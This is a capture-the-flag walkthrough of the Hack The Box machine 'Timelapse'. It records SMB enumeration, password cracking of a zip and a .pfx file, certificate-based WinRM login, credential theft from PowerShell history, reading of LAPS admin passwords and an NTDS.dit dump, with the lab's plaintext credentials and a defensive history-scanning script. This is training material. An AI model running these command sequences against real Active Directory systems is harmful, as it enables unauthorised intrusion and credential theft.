# Timelapse

## Nmap

```
sudo nmap 10.10.11.152 -Pn -p- -sS -sV

PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-07-02 14:42:07Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49696/tcp open  msrpc             Microsoft Windows RPC
58212/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```

Starting out we check anonymous logon with `smbmap`, where we find that the "Shares" share is readable for us (read-only access).

```bash
smbmap -H '10.10.11.152' -u 'a' -p '' -d 'timelapse.htb'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FH10kCDtyN0oggGxotbw0%2Fimage.png?alt=media\&token=7d67130a-4ba4-431d-a042-f2d20c816b06)

Recursively searching the share with `smbmap` reveals that LAPS may be installed in the environment, as well as the interesting file `winrm_backup.zip`.

```bash
smbmap -H '10.10.11.152' -u 'a' -p '' -d 'timelapse.htb' -r
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FVIUi0EOASIVtJk5Ka2ss%2Fimage.png?alt=media\&token=4ba77ba3-0fed-4bbc-955b-e6a86e3ed2e1)

Download the file:

```bash
smbmap -H '10.10.11.152' -u 'a' -p '' -d 'timelapse.htb' -R -A .zip
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FswewfvMcKWID0I9Q0vFB%2Fimage.png?alt=media\&token=084aaec8-5453-4568-9722-227d5a942321)

As the zip file is password protected, we can use `zip2john` to turn it into a crackable hash and then crack it.

```bash
/usr/sbin/zip2john 10.10.11.152-Shares_Dev_winrm_backup.zip > winrmbackup.hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FOZCl0a9vnDcGGbwVFr3D%2Fimage.png?alt=media\&token=cadb00cb-73a5-4fc7-acfb-86bf4981d153)

Supplying john with the `rockyou.txt` word list, we find the hash is cracked quickly.

```bash
sudo john --wordlist=/usr/share/wordlists/rockyou.txt winrmbackup.hash 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FdkHBSokLcpr6TRx0hpqQ%2Fimage.png?alt=media\&token=d1e17a64-02fb-404f-9329-88d2e70380e8)

We are left with the file `legacyy_dev_auth.pfx`. A .pfx file is a PKCS#12 archive, which bundles a certificate together with its private key, usually protected by a password.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FM1hw9qXtGN1XPAXG1S5e%2Fimage.png?alt=media\&token=54f64450-2628-459d-a779-9466c205827e)

Again, we need to hash the `.pfx` file and crack its password.

```bash
/usr/bin/pfx2john legacyy_dev_auth.pfx >> pfx.hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FtihvyosBOd7w92N7V9Mq%2Fimage.png?alt=media\&token=e49243ee-4d83-45d5-96c0-0ac53a950a95)

With the .pfx file we can now look at how to connect to the target system. WinRM supports certificate authentication: the client presents a public certificate and proves possession of the matching private key, and both of these can be extracted from the .pfx file.

I used the following link for guidance on how to extract this information:

**URL:** <https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file>

```bash
# Extract the private key (prompts for the .pfx password cracked above,
# then for a passphrase to protect the exported key)
openssl pkcs12 -in [yourfile.pfx] -nocerts -out [drlive.key]

# Extract the certificate (again prompts for the .pfx password)
openssl pkcs12 -in [yourfile.pfx] -clcerts -nokeys -out [drlive.crt]

# Decrypt the private key, i.e. strip the passphrase so evil-winrm can load it
openssl rsa -in [drlive.key] -out [drlive-decrypted.key]
```

**Note:** You may need to connect to a TCP OpenVPN configuration for the following to connect successfully.

```bash
evil-winrm -i '10.10.11.152' -c 'drlive.crt' -k 'drlive-decrypted.key' -S -r 'timelapse.htb'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FtcPb7OCASHB89PGa0JeI%2Fimage.png?alt=media\&token=b7d5f5ae-4ca7-4528-aaac-43b86655ba39)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F7jOWgeXePVadUiQZBnFs%2Fimage.png?alt=media\&token=3687f3de-972d-4588-91d0-6c1a368a73a7)

From here we look into the `ConsoleHost_History.txt` file and find credential information contained within.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FNhCO2XrWi7terrg2Zy6m%2Fimage.png?alt=media\&token=d0492547-cbce-4a1c-bdba-cf128ac6b467)
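The PSReadLine history file is exactly where a defender should look for leaked secrets before an attacker does. The following is an added example (not part of the original write-up) that scans `ConsoleHost_History.txt` content for the command shapes that embed a password; the history lines and the secret in them are constructed, not the real file from the box.

```python
"""Added example (not from the original write-up): flag PowerShell history
lines that carry credentials, the pattern that exposed svc_deploy here.
SAMPLE_HISTORY below is constructed for illustration."""
import re

# Constructed sample of %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_History.txt
SAMPLE_HISTORY = """\
whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'S3cretValue!' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('timelapse\\svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
net user backupadmin Passw0rd123 /add
"""

# Each pattern captures the secret in group 2 so the report can redact it.
PATTERNS = [
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+(?:-String\s+)?(['\"])(.+?)\1[^\n]*-AsPlainText", re.I)),
    ("-Password / -p argument",
     re.compile(r"-(?:Password|p)\s+(['\"]?)(\S+?)\1(?=\s|$)", re.I)),
    ("net user <name> <password>",
     re.compile(r"net\s+user\s+\S+\s+(['\"]?)(\S+)\1(?=\s+/add|\s*$)", re.I)),
]


def scan_history(text):
    """Return [(line_no, rule, redacted_line)] for every line embedding a secret."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for rule, rx in PATTERNS:
            m = rx.search(line)
            if m:
                secret = m.group(2)
                findings.append((no, rule, line.replace(secret, "<redacted>")))
                break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for no, rule, line in scan_history(SAMPLE_HISTORY):
        print(f"line {no}: {rule}: {line}")
```

Pointed at every user profile on a host (or at forwarded copies of the file), the same function gives a quick inventory of which accounts have plaintext secrets sitting in their shell history.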

We now have the credentials `svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV`.

```bash
evil-winrm -i '10.10.11.152' -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S -P 5986
```

Viewing the group memberships for our current user we see we are a member of "LAPS Readers".

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FiU5kV3htDZX7tcSwssh3%2Fimage.png?alt=media\&token=adaa93cd-1202-4db0-bb2e-c02ad65cd348)

Knowing this, we can run the following PowerShell command to pull the LAPS-managed local administrator password for the host DC01 (the `ms-Mcs-AdmPwd` attribute is only returned for computers whose password we are allowed to read, hence the null filter).

```powershell
Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd' | Where-Object { $_.'ms-Mcs-AdmPwd' -ne $null } | Select-Object 'Name','ms-Mcs-AdmPwd'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F1y6oRsosdJ160Rqz6uSp%2Fimage.png?alt=media\&token=180f4fb1-64c6-48a6-9128-0c713a3946fe)

We are then able to use `Evil-WinRM` to authenticate against the target system with the LAPS password.

```bash
evil-winrm -i '10.10.11.152' -u 'administrator' -p '+K)HlT72oO(W6;W&402qD9LS' -S -P 5986
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fthl5RsXrkqiIL6UwvvRy%2Fimage.png?alt=media\&token=38a077dd-1efe-4f47-876f-4935636b2b9f)

Then grab the **root** flag.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FLxOUHwaSTQYlvgbvuFAo%2Fimage.png?alt=media\&token=48a013a8-753a-4674-acef-1536379f5582)

`crackmapexec` has also been used with these credentials to dump the `NTDS.dit` hashes from the target system.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FguwpDTXRNraMzG9GV6QD%2Fimage.png?alt=media\&token=dece1079-2ca2-4c7b-836d-37231dca4010)
